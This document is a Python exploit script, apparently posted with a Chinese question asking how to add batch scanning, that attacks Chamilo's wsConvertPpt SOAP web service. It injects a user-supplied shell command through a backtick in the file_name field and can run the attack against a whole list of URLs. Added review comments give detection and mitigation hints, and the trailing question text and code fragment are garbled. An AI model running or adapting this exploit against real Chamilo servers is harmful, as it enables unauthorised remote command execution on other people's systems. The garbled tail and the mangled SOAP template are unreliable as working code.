# 导入os模块用于检测文件是否存在

import argparse
import os

import requests

# 定义检测url函数

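def check_url(url, command):
    """POST the page's wsConvertPpt SOAP template to *url* and report the reply.

    Args:
        url: Base URL of the Chamilo installation. It is used both as the
            request target prefix and as the ``ns1`` namespace value in the
            template.
        command: Text substituted, unescaped, into the ``file_name`` portion
            of the template.

    Returns:
        True when the endpoint answers with HTTP 200 and the reply contains
        the string ``wsConvertPptResponse``; False otherwise, including when
        the request itself fails.
    """
    # NOTE(review): as printed on the page this template is not well-formed
    # XML (the element tags inside the Body appear to have been stripped by
    # the page rendering). It is reproduced byte-for-byte, not repaired.
    #
    # Detection: every request built here is a POST to
    # /main/webservices/additional_webservices.php naming wsConvertPpt with a
    # backtick in the file_name value, which is what to search for in
    # web-server and WAF logs. Mitigation is to run a patched Chamilo release
    # and to block unauthenticated access to that endpoint.
    body = ''' <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">SOAP-ENV:Bodyns1:wsConvertPptfile_datafile_name{}`.pptxservice_ppt2lp_size720x540</ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)

    try:
        response = requests.post(
            '{}/main/webservices/additional_webservices.php'.format(url),
            data=body,
            headers={'Content-Type': 'text/xml; charset=utf-8'},
            # Without a timeout one unresponsive host stalls the whole run.
            timeout=10,
        )
    except requests.RequestException:
        # The original bare ``except:`` also swallowed KeyboardInterrupt and
        # programming errors; only transport/URL failures mean "no answer".
        return False

    # This only shows that the endpoint processed a wsConvertPpt call. It is
    # not evidence that anything ran on the server, so a True result is a
    # heuristic and a False result does not prove the host is patched.
    return response.status_code == 200 and "wsConvertPptResponse" in response.text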

# 定义批量检测函数

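def batch_check_urls(file_path, command):
    """Run check_url on every URL listed in *file_path*, printing one verdict each.

    Args:
        file_path: Path of a text file holding one base URL per line.
        command: Passed unchanged to check_url for every URL.

    Returns:
        None. Results are written to stdout only.
    """
    # Stop early when the list file does not exist.
    if not os.path.exists(file_path):
        print(f"{file_path} not exists")
        return

    with open(file_path, 'r') as f:
        # Iterate the file lazily instead of loading every line up front.
        for line in f:
            url = line.strip()
            if not url:
                # Blank lines used to be sent to check_url as an empty URL
                # and were then reported as "not vulnerable".
                continue
            # The verdict printed here inherits check_url's heuristic: it
            # reflects the shape of the HTTP reply, not a confirmed outcome.
            if check_url(url, command):
                print(f"URL vulnerable: {url}")
            else:
                print(f"URL not vulnerable: {url}")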

# 主函数

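# Script entry point. The page rendering dropped the double underscores
# (``name == 'main'``), which raises NameError; the standard guard is restored.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Url of your Chamilo", required=False)
    parser.add_argument("-c", "--command", help="Command to execute", required=False)
    parser.add_argument("-f", "--file", help="File path of urls", required=False)

    args = parser.parse_args()

    if args.file is not None:
        # NOTE(review): -c is not required in this branch, so args.command may
        # be None and the text "None" is then substituted into every request.
        batch_check_urls(args.file, args.command)
    elif args.url is not None and args.command is not None:
        # check_url only inspects the HTTP reply, so the "Command executed"
        # message below reports a heuristic match, not a confirmed result.
        if check_url(args.url, args.command):
            print(f"Command executed: {args.command}")
        else:
            print(f"An error has occured, url is not vulnerable: {args.url}")
    else:
        # The closing parenthesis of this call was missing on the page.
        print("Please specify a file path of urls with -f or --file, or a url and command to execute with -u and -c")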
我想加一个-f批量检测文件里的url的功能import argparseimport requestsdef execute_commandurl commandbody = xml version=10 encoding=UTF-8SOAP-ENVEnvelope xmlnsSOAP-ENV=httpschemasxmlsoaporgsoapenvelope xmlnsns1= xmlnsxsi
